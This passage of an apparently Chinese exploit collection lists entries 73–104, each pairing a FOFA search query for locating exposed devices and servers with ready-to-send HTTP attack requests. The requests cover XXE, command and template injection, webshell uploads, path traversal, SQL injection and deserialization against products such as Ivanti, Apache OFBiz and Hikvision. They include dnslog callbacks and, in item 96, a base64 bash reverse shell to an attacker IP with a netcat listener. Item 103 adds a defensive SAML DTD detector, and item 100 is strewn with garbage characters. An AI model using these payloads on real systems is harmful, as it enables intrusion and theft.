S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

The <serializable> element of the Apache XML-RPC extensions namespace is deserialized server-side, which is what turns a gadget chain into code execution. The methodName is arbitrary.

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the PoC above (recompute Content-Length for the actual body):
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The command output is returned in the exception message, so this request doubles as an echo check.

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Caveat: only the form body is URL-decoded, which is why the outer command avoids spaces with '+' and the {echo,...} brace form. The base64 blob as published decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1, i.e. with literal %20 instead of spaces, and bash will not decode those; regenerate it from bash -i >& /dev/tcp/<attacker-ip>/7777 0>&1 with real spaces before use.

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

PAYLOAD is a Shiro rememberMe cookie (an AES-encrypted, base64-encoded serialized gadget chain built with the application's Shiro key). The gadget used by this PoC takes the command to run from the X-Token-Data header, so the echoed string appearing in the response indicates success.

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 119
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

The script value is placed inside a generated JavaScript function body: the leading %7D ("}") closes that body so the Java call sits at top level, and the trailing %7B ("{") reopens a block so the definition stays syntactically valid. A DNS query to the dnslog host confirms execution.

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 152
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

URL-decoded, the body is the JSON call {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}; the param string is passed to the ping method of SysManager unsanitized, and the text after the pipe is executed.

8 y) ^2 |0 G* B+ ]5 @+ J100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
' a9 c2 r1 w5 e' JCVE-2024-0352' z4 t: H" b( y
FOFA:icon_hash="874152924"9 H7 g+ A1 h" [% D3 F4 _' B1 D+ m
POST /api/file/formimage HTTP/1.14 }* y" H( I: r# J' f
Host: 192.168.40.130
7 |+ D5 e* h0 X- y% `' SUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.367 ^: b ~+ c$ F: e$ [# f
Connection: close
7 b( U# o/ u3 N) TContent-Length: 201
8 k* F8 W2 O$ H) D) ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
. X' m, R; Z6 r. n: r# d" ZAccept-Encoding: gzip+ [% m; a/ n. x
* S" Z+ w% v3 M4 H9 O' r
------WebKitFormBoundarygcflwtei8 Q8 u1 I% o/ N6 e
Content-Disposition: form-data; name="file";filename="IE4MGP.php"9 \( G8 `" C' Z
Content-Type: application/x-php/ Z; E/ v# ~) h# u% h1 v& Z
8 ^- ?# n: }" |: {2ayyhRXiAsKXL8olvF5s4qqyI2O9 g( x) r% _2 G( E% F4 X
------WebKitFormBoundarygcflwtei--
5 v0 t W9 \9 h: J* _6 J6 d* z- T; t3 u
% L" l" H/ K9 K# L7 f' P
101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The /api/v1/totp/user-backup-code/../../ prefix is the CVE-2023-46805 authentication bypass (the path is authorised before it is normalised); the command follows the URL-encoded ';' in the keys-status path segment and is injected into the shell command the handler builds.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The SAML component fetches the ds:RetrievalMethod URI while processing the signature's KeyInfo, which is the SSRF; the signature value itself is never validated before that fetch. A DNS hit on the dnslog host confirms the vulnerable code path.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (SAML POST binding, no DEFLATE step). The parameter entity declared in the DTD makes the parser fetch the external URL, so a DNS hit on the dnslog host confirms the XXE:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

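For defenders, the useful check on this traffic is to decode the SAMLRequest parameter and look for a DTD: a legitimate SAML AuthnRequest never carries one. The following is an added example, not code from the original article or from Ivanti. It handles both the POST binding used in the PoC above (plain base64) and the Redirect binding (raw DEFLATE before base64), repairs the '+' to space damage that form decoding does to base64, and pulls out the SYSTEM identifiers of declared entities, which are the out-of-band callback hosts. The PoC's own SAMLRequest is used as the sample input; the benign AuthnRequest is constructed for the comparison.

```python
import base64
import re
import zlib
from urllib.parse import parse_qs


def decode_saml_request(value):
    """Return the XML carried in a SAMLRequest parameter value.

    POST binding: plain base64. Redirect binding: raw DEFLATE, then base64,
    so inflate when the decoded bytes do not already start with '<'.
    Form decoding turns '+' into a space, which corrupts base64; undo it first.
    """
    raw = base64.b64decode(value.replace(" ", "+"))
    if raw[:1] == b"<":
        return raw
    return zlib.decompress(raw, -15)


def encode_redirect_binding(xml_bytes):
    """Inverse for the Redirect binding: raw DEFLATE (no zlib header), then base64."""
    comp = zlib.compressobj(wbits=-15)
    return base64.b64encode(comp.compress(xml_bytes) + comp.flush()).decode()


def has_dtd(xml_bytes):
    """A SAML AuthnRequest never legitimately declares a DTD or entities."""
    head = xml_bytes[:4096].upper()
    return b"<!DOCTYPE" in head or b"<!ENTITY" in head


def external_entity_urls(xml_bytes):
    """SYSTEM identifiers of declared entities: the hosts the parser would call back to."""
    return [u.decode() for u in re.findall(rb'''SYSTEM\s*["']([^"']+)["']''', xml_bytes)]


def scan_form_body(body):
    """Scan an x-www-form-urlencoded body such as a POST captured on
    /dana-na/auth/saml-sso.cgi. Returns (flagged, callback_urls)."""
    for value in parse_qs(body).get("SAMLRequest", []):
        try:
            xml_bytes = decode_saml_request(value)
        except (ValueError, zlib.error):
            return True, []          # undecodable SAMLRequest: treat as hostile
        if has_dtd(xml_bytes):
            return True, external_entity_urls(xml_bytes)
    return False, []


# Sample input: the PoC's own SAMLRequest value, as published above.
POC_BODY = ("SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNo"
            "VG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==")

# Constructed benign request for comparison (not captured from a real IdP exchange).
BENIGN_XML = b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0"/>'

if __name__ == "__main__":
    print(scan_form_body(POC_BODY))
    print(scan_form_body("SAMLRequest=" + encode_redirect_binding(BENIGN_XML)))
```

Run it against the decoded bodies of POST requests to saml-sso.cgi (or any SAML SP endpoint); a hit with a non-empty URL list gives you the attacker's callback host directly.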
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

The token field is left empty: the getSysStatusCfg topic answers without a valid session, and the response contains the device configuration.

